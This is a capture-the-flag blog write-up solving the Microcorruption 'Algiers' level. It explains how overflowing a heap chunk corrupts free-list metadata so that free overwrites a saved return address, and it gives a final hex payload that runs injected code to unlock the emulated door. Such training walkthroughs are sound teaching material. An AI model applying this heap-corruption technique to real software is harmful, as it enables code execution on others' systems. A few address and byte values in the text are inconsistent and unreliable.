Next up is the first 100-pointer in Microcorruption: Algiers. This level corresponds to a new class of bug. Previously, we were using printf format attacks, now, we’ll be using use-after-free (UAF) attacks.
Let’s get started by talking about changes to the software at this level, and how I knew what approach to take (sorta 😉).
Updates to the LockIt Pro
When we start the level, we’re presented with release notes. It talks about how the LockIt Pro Account Manager is able to handle multiple users via the use of PINs assigned to each user.
That didn’t seem to be that relevant to the solution though, so let’s keep looking.
Algiers Microcorruption Software
The first thing I noticed while scrolling through the code was Heap exausted [sic]; aborting.
in the strings section.
I also noticed we’ve got malloc
and free
. We’ve also got an unconditional unlock_door
function:
The address of this function is 0x4564. We’ll probably use that later.
Lastly, the main logic of the program (in the login
function) looks like this:
463a <login>
463a: 0b12 push r11
463c: 0a12 push r10
463e: 3f40 1000 mov #0x10, r15
4642: b012 6444 call #0x4464 <malloc>
4646: 0a4f mov r15, r10
4648: 3f40 1000 mov #0x10, r15
464c: b012 6444 call #0x4464 <malloc>
4650: 0b4f mov r15, r11
4652: 3f40 9a45 mov #0x459a, r15
4656: b012 1a47 call #0x471a <puts>
465a: 3f40 c845 mov #0x45c8, r15
465e: b012 1a47 call #0x471a <puts>
4662: 3e40 3000 mov #0x30, r14
4666: 0f4a mov r10, r15
4668: b012 0a47 call #0x470a <getsn>
466c: 3f40 c845 mov #0x45c8, r15
4670: b012 1a47 call #0x471a <puts>
4674: 3f40 d445 mov #0x45d4, r15
4678: b012 1a47 call #0x471a <puts>
467c: 3e40 3000 mov #0x30, r14
4680: 0f4b mov r11, r15
4682: b012 0a47 call #0x470a <getsn>
4686: 0f4b mov r11, r15
4688: b012 7045 call #0x4570 <test_password_valid>
468c: 0f93 tst r15
468e: 0524 jz #0x469a <login+0x60>
4690: b012 6445 call #0x4564 <unlock_door>
4694: 3f40 0b46 mov #0x460b, r15
4698: 023c jmp #0x469e <login+0x64>
469a: 3f40 1b46 mov #0x461b, r15
469e: b012 1a47 call #0x471a <puts>
46a2: 0f4b mov r11, r15
46a4: b012 0845 call #0x4508 <free>
46a8: 0f4a mov r10, r15
46aa: b012 0845 call #0x4508 <free>
46ae: 3a41 pop r10
46b0: 3b41 pop r11
46b2: 3041 ret
We’re going to:
Malloc
some things (twice, presumably once for username and once for password).- Prompt the user, get some input (again, twice).
- Call
test_password_valid
- Depending on the results of that (in r15), either unlock the door or tell the user they’re wrong.
- Call
free
twice and return.
Malloc
You may remember malloc
as the mysterious creature from your college “Intro to C” class. Malloc (memory allocation) is a way of specifying memory dynamically.
Wikipedia talks about how memory can be allocated in C: statically, automatically, or dynamically.
Static-duration variables are allocated in main memory, usually along with the executable code of the program, and persist for the lifetime of the program; automatic-duration variables are allocated on the stack and come and go as functions are called and return. For static-duration and automatic-duration variables, the size of the allocation must be compile-time constant (except for the case of variable-length automatic arrays5). If the required size is not known until run-time (for example, if data of arbitrary size is being read from the user or from a disk file), then using fixed-size data objects is inadequate.
…Dynamic memory allocation [is a method in which] memory is more explicitly (but more flexibly) managed, typically, by allocating it from the free store (informally called the “heap”), an area of memory structured for this purpose. In C, the library function malloc is used to allocate a block of memory on the heap. The program accesses this block of memory via a pointer that malloc returns. When the memory is no longer needed, the pointer is passed to free which deallocates the memory so that it can be used for other purposes.
To recap:
- Sometimes (like in the case of not knowing required size at compile time), we need to use dynamic memory allocation.
- In C, this means using malloc to allocate memory in a portion of memory called the “heap”.
- To use malloc, we need to pass in the amount of memory we want allocated. We get a pointer back (which we should check!)
- After we’re done with that memory, we need to
free
it, which requires a pointer to the memory location as an argument tofree
.
If we search for a man page, we can see that the function signatures match what we’ve just described:
void *malloc(size_t size);
void free(void *ptr);
C still uses malloc (as opposed to C++ which uses new
and free
), so unlike gets
, it might not be inherently insecure. We might be able to find an implementation mistake, however.
Some Weird Things
At this point I noticed some weird things, namely:
- What is happening at the end of
test_password_valid
? It seems like we don’t use 2/3rds of the code in that function. - Why are we only
malloc
-ing 0x10 bytes, butgets
-ing 0x30 bytes each time? - No check after
malloc
is called to see if we got a valid pointer back.
A quick search through the manual shows nothing for “malloc” or “free” or “heap” so let’s assume there’s nothing particularly unique about this implementation (or at least, the manual hasn’t given us any clues).
Malloc Overflow?
Since we’re allocating less memory space than what we are getting via gets
, it seems like there’s possibility for an overflow. I searched for “malloc overflow” and found this:
The malloc() overflow 11 exploits the heap memory objects allocated via the memory allocator in the GNU C library. The memory allocated by malloc() not only includes the user requested block but also the data used to manage the heap (size of the block, pointer to other blocks and the like). The vulnerability is that a heap variable can be overflowed to overwrite those management data. Exploits based on this technique can bypass stack-based defensive techniques such as StackGuard, StackShield, Libsafe and Solar Designer’s stack patch.
The “pointer to other blocks” has me curious. I found this presentation, which (among other things) asks the audience to guess how many bytes are allocated for each malloc call (with inputs of 0,
A few slides later, we see that each chunk of memory returned by malloc contains some metadata (in addition to the intended data), namely the size of the previous chunk and the overall size of the current chunk.
When I started writing this blog post (which is to say, when I was taking notes on this level as I was trying to learn/solve it), I had a section called “learning malloc by staring at bits”. I set breakpoints at 0x463e, 0x4648, and 0x4650, which is before the first malloc
, after the first malloc
, and after the second malloc
.
This is with empty username and password inputs (after both mallocs occur):
You can see some repeated 0824
s, as well as other numbers that (also) look like addresses when adjusted for endianness: 241e, 2434, etc.
241e
(in location 0x240a) looks like where the first malloc’d block stops. Similarly, 0x2434 (in location 0x2420) looks like where the second block stops.
Since I know that gets
allows us to input more characters than we have room for in our malloc’d location, I entered in AAAABBBBCCCCDDDDDEEEE
. It overwrote some of the 0824 blocks that were shown above:
Let’s take a super quick detour to the end of login
where we’ve got a return call that we could (maybe?) reroute.
If we set a breakpoint there, we see that the return value of 0x4440 (which sends us to ‘stop program execution’) is stored at address 0x439a. Unfortunately, it’s out of reach of our gets
input (0x30 for username and 0x30 for password).
So, where does that leave us?
The presentation I linked to earlier discusses malloc overflows, but within the context of having a function pointer to overwrite. It would appear that our code is less interesting than that, so let’s keep going in the list and see what other ideas might apply.
Use After Free
Again, from the presentation, Use After Free (UAF) is:
A class of vulnerability where data on the heap is freed, but a leftover reference or ‘dangling pointer’ is used by the code as if the data were still valid
To briefly recap, our program malloc
'd 0x10 bytes worth of space for the username and password (each), then gets
'd up to 0x30 bytes (each). That means that we could overflow the username-allocated chunk and overwrite information in the metadata of the password-allocated memory chunk. Then when we free
both chunks, and somehow use the free
'd data and maybe execute some bad code?
My notes at this point after many, many strings of different hex-encoded values. A lot of this was iterative learning-by-doing. I knew that I needed to overflow the username portion, and that overflow’d part had the ability to overwrite other parts of the data. But why did that work?
For example, if I type AAAABBBBCCCCDDDDEEEE
as a username, which is 4141414142424242434343434444444445454545
in hex-encoding, and let the program continue
, I get an error about a load address unaligned
at line 0x4520.
If I swap out my 45
s with 46
s (Fs), then let the program run, I see that two lines of instructions in the 0x4646 block of memory are overwritten:
Again, why does this happen?
Something Amiss in the Free
Call
We know that this change happens after the calls to free
, so let’s set a breakpoint on line 0x4508. We also know that the affected (overwritten) instructions correspond to the overflowed input that we’re providing for the username. Lastly, we know that that area of code used to have 0x2434 in that location, which seems to be a pointer to the end of the second malloc
'd block of code.
Again, with an input of AAAABBBBCCCCDDDDFFFF
for the username (and whatever/nothing for the password), I wrote up these comments on each instruction of free
:
4508 <free>
4508: 0b12 push r11
// after this, r15 has 241e, or the location of the start of the first malloc block.
450a: 3f50 faff add #0xfffa, r15
// this is 0000 (at least for an empty password input)
450e: 1d4f 0400 mov 0x4(r15), r13
// r13 still 0000!
4512: 3df0 feff and #0xfffe, r13
// 0x4(r15)... is still 0000
4516: 8f4d 0400 mov r13, 0x4(r15)
// ah ha! here, r14 gets the value of "4646"
451a: 2e4f mov @r15, r14
// now we're grabbing data from around the 0x4646 memory block.
451c: 1c4e 0400 mov 0x4(r14), r12
// is it a properly aligned address?
4520: 1cb3 bit #0x1, r12
// it is...
4522: 0d20 jnz #0x453e <free+0x36>
// so we continue here and do some math... 0x4(r14) was 0x10, now we have 0x16 in r12.
4524: 3c50 0600 add #0x6, r12
// 0 + 0x16 is 0x16
4528: 0c5d add r13, r12
// now we're putting this new value into back into the location we originally got it from and overwriting 0x4(r14), which is 0x464a
452a: 8e4c 0400 mov r12, 0x4(r14)
// oh cool, now we wrote "0x4646" into location 0x4648.
4534: 1d4f 0200 mov 0x2(r15), r13
// now we've written 0x4646 to location 0x4646
452e: 9e4f 0200 0200 mov 0x2(r15), 0x2(r14)
4538: 8d4e 0000 mov r14, 0x0(r13)
453c: 2f4f mov @r15, r15
// getting the 0x4646...
453e: 1e4f 0200 mov 0x2(r15), r14
// ...and 0x16 values that we just wrote and putting them back into r14 and r13, respectively
4542: 1d4e 0400 mov 0x4(r14), r13
// making sure this is a valid address (lulz)
4546: 1db3 bit #0x1, r13
// it is...
4548: 0b20 jnz #0x4560 <free+0x58>
// doing some more math
454a: 1d5f 0400 add 0x4(r15), r13
454e: 3d50 0600 add #0x6, r13
// and now we're clobbering an address near 0x4646 again (at 0x464a)
4552: 8f4d 0400 mov r13, 0x4(r15)
// and another one (really we're just overwriting the values with the same value)
4556: 9f4e 0200 0200 mov 0x2(r14), 0x2(r15)
// yep
455c: 8e4f 0000 mov r15, 0x0(r14)
4560: 3b41 pop r11
// okay and we're done
4562: 3041 ret
Some takeaways from that: we can now see how the overwritten
messages are getting into the 0x4646 block, because we’re clobbering 3 different addresses. I tried using this to overwrite some instructions at the end of login
by following that address value with the new value I was trying to write. But, I would always end up shooting myself in the foot by destroying part of the (valid) instructions at the location I wanted to go to, since the instructions and the location are pretty closely coupled.
But, we know that whatever we put in that special (previously) 0x2434 location gives us a portal to changing/overwriting the data at that location.
Normal Free
Having walked through the code step-by-step for an overflowed value, it seems like it’d be useful to walk through it with a non-overflowed value, to understand how free
works under normal conditions.
If our username is AAAABBBBCCCCDDDD
and our password is aaaabbbbccccdddd
, then a pre-first-free
looks like this, with the 0x2434 (“end of the second block”) still intact:
In the overflowed case, line 0x451a is where it gets interesting. Previously, this put 0x4646
into r14, but now it’s just puts 0x2400
which is the beginning of this block of memory.
451a: 2e4f mov @r15, r14
By the time both free
s are over, that chunk of memory looks like this:
Which is to say that some of our metadata in the 0x2400 block got clobbered.
Bringing this back around to the overflowed case, free is using a pointer to the metadata to update (and “free”) that block of code. if we’re able to overwrite that pointer, we can then change the values stored at a new location. Finally, we will use that to reroute program execution back to input of our choosing, which will then be executed.
Algiers Strategy
If you recall, UAF is where the “dangling” pointer (leftover after a free call) is used.
My strategy at this point is to:
- Overwrite value 0x4440 at location 0x439a to the location of my input, instead. This will allow me to
return
to my code, instead of ending program execution. - I will overwrite this value by overflowing the username input, which means that I’m overwriting a pointer. When
free
is called, it will overwrite my location, thinking that it is changing metadata. - I’ll use my password input to have an instruction that says “call the unlock_door” function. Using the assembler, this instruction will be
b012 6445
. (Later, I will change this so that I don’t need a password input at all. Instead, I’ll put the instructions in my username input).
So let’s get started on that.
Creating the username
For my username, I need 16 bytes of arbitrary data. I’ll use 90
s (no-ops).
username: 90909090909090909090909090909090
Next, I need to add the new address that I’m trying to reroute the program to. Since I originally did this pointing to the password location, this value is 0x2420. Later, it will be 0x2410 (within the username block).
username: 909090909090909090909090909090902024
Finally, I need the location of the address that I’m trying to put 0x2420 into. This is 0x439a.
username: 9090909090909090909090909090909020249a43
Creating the password
The password input is our instruction to call the unlock_door
function, but adjusted for the math that happens (add 0x6, etc):
password: a4126445
This blog post is already getting tediously long but I recommend that you provide this (hex-encoded) username input and step through the input function.
Why this works
This will reroute the program to return to 0x2420 at the end of login
, instead of 0x4440. 0x2420, which is part of our recently freed password block of memory, contains instructions (b012 4564
) to call the unlock door function.
Of course, after completing this, I checked the rankings. I saw that other people did it in 20 bytes, whereas I did it in 24 bytes. I thought that they must have put their assembly instructions within the username, so I improved on my solution.
The b012 4564
assembly needs to go somewhere in the username block. After we change that, we have to update our username input (the overflow portion) to account for this new location. Then, we can input nothing for the password.
Part of the username gets clobbered by the “free
metadata overwrite” part, so I just repeated the assembly instructions for most of the first 16 bytes:
username: 90909090b0126445b0126445b0126445
The remaining bytes are the new address (0x2410) and then the same 0x493a value.
username: 90909090b0126445b0126445b012644510249a43
password: [nothing]
Microcorruption Algiers Solution
Okay, this has been a loooong blog post. To solve this level, type solve
and then input 90909090b0126445b0126445b012644510249a43
as the username, and nothing for the password.
This will reroute the program to return to 0x2410 at the end of login
, instead of 0x4440 (by overwriting the value at 0x439a). 0x2410, which is part of our recently freed username
block of memory, contains instructions (b012 4564
) to call the unlock door function. Ta da!
Hopefully you understand the dangers of memory allocation a little bit better after this post. Happy hacking!